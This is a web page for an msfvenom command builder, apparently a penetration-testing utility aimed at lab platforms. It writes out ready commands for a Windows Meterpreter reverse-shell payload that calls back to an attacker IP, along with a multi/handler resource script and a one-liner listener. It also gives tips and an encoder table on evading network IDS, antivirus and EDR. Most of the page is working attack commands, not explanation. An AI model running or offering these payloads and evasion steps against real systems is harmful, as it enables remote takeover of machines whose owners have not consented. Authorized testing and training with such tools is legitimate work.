msfvenom is a Metasploit Framework tool that combines payload generation and encoding into a single command-line utility. It creates payloads in various formats (exe, elf, raw, etc.) for different platforms and architectures.

How do I use this msfvenom builder?

Select your target platform, architecture, and payload type. Enter your LHOST (attacker IP) and LPORT (listening port), choose an output format and optional encoder, then copy the generated msfvenom command and matching listener command.

MSFVenom Command Builder

Build msfvenom commands for 10 platforms with matching listener commands, one-liner alternatives, and encoder options. Supports Windows, Linux, macOS, Android, PHP, Python, Java, NodeJS, Ruby, and Perl payloads. For authorized testing only.

X LinkedIn Reddit

Platform & Architecture

Platform / OS

Architecture

Payload16/16

windows/meterpreter/reverse_tcp

Staged Meterpreter session over TCP. Smaller initial payload, requires handler.

MeterpreterStaged

Staged: Small stager (~5KB) connects back to download the full payload. Requires active handler. Smaller initial footprint but needs stable connection.

Parameters

LHOST (your IP)

Use 0.0.0.0 to listen on all interfaces. Use your tun0/VPN IP for HTB/THM.

LPORT (your port)

Output & Encoding

Output Format

Encoder

Generated Command

msfvenom command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o payload.exe

Extended resource file with session management, auto-migration, and stage encoding. Save as handler.rc and run with msfconsole -r handler.rc.

handler.rc (resource file)

# Metasploit Multi/Handler Resource Script
# Usage: msfconsole -r handler.rc

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.1
set LPORT 4444

# Session management
set ExitOnSession false
set EnableStageEncoding true

# Auto-run scripts on session connect
set AutoRunScript multi_console_command -c "sysinfo; getuid"
set InitialAutoRunScript migrate -f

# Advanced options
set SessionCommunicationTimeout 0
set AutoVerifySession true

exploit -j -z

# After session: sessions -i 1

Quick handler (one-liner)

msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.10.14.1; set LPORT 4444; set ExitOnSession false; exploit -j -z"

Handler Options Explained

ExitOnSession false — Keep handler running after first session connects (catch multiple callbacks)

exploit -j -z — Run as background job (-j) and don't interact immediately (-z)

AutoRunScript migrate — Automatically migrate to a stable process on connection

EnableStageEncoding true — Encode the stage payload during transmission to avoid network IDS

LHOST 0.0.0.0 — Listen on all interfaces (vs specific IP for targeted listening)

List payloads: msfvenom -l payloads | grep windows

List encoders: msfvenom -l encoders

List formats: msfvenom -l formats

Nops: msfvenom -l nops

Payload vs Exploit

Exploit: Code that takes advantage of a vulnerability to gain access or execute code on a target system.

Payload: Code that runs after the exploit succeeds. It's what you want to do on the target (reverse shell, Meterpreter, command execution).

msfvenom generates payloads. Exploits are separate modules in Metasploit that deliver these payloads.

Staged vs Stageless Comparison

Aspect	Staged (/)	Stageless (_)
Naming	`shell/reverse_tcp`	`shell_reverse_tcp`
Size	~5-10 KB (stager only)	~200-500 KB (full payload)
Handler needed	Yes (must stage payload)	Yes (but no staging step)
Network	Needs stable connection	Works in restrictive networks
Detection	Harder to detect initially	Easier to signature
Best for	Exploit buffer overflow, size limits	Standalone delivery, unstable networks

Encoder Effectiveness

Encoder	Arch	Type	AV Bypass
shikata_ga_nai	x86	Polymorphic XOR	Low (heavily signatured)
call4_dword_xor	x86	XOR DWORD	Low
zutto_dekiru	x64	Polymorphic	Medium
xor (x64)	x64	XOR	Medium
powershell_base64	Any	Base64	Low (AMSI detects)

Note: Encoding alone is insufficient for modern AV/EDR bypass. Combine with custom loaders, encryption, or external tools.

Related Tools

Shellcode Encoder & Formatter

Convert shellcode between 11 formats with XOR encoding.

IP / CIDR Calculator

Subnet calculator, IP converter, and SSRF bypass generator.

Callback Catcher Helper

Generate callback payloads for OOB testing and exfiltration.

Attack Chain Builder

Build and visualize multi-step attack chains.

$loading...

# Metasploit Multi/Handler Resource Script # Usage: msfconsole -r handler.rc use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 10.10.14.1 set LPORT 4444 # Session management set ExitOnSession false set EnableStageEncoding true # Auto-run scripts on session connect set AutoRunScript multi_console_command -c "sysinfo; getuid" set InitialAutoRunScript migrate -f # Advanced options set SessionCommunicationTimeout 0 set AutoVerifySession true exploit -j -z # After session: sessions -i 1

Aspect

Staged (/)

Stageless (_)

Naming

shell/reverse_tcp

shell_reverse_tcp

Size

~5-10 KB (stager only)

~200-500 KB (full payload)

Handler needed

Yes (must stage payload)

Yes (but no staging step)

Network

Needs stable connection

Works in restrictive networks

Detection

Harder to detect initially

Easier to signature

Best for

Exploit buffer overflow, size limits

Standalone delivery, unstable networks

Encoder

Arch

Type

AV Bypass

shikata_ga_nai

x86

Polymorphic XOR

Low (heavily signatured)

call4_dword_xor

x86

XOR DWORD

Low

zutto_dekiru

x64

Polymorphic

Medium

xor (x64)

x64

XOR

Medium

powershell_base64

Any

Base64

Low (AMSI detects)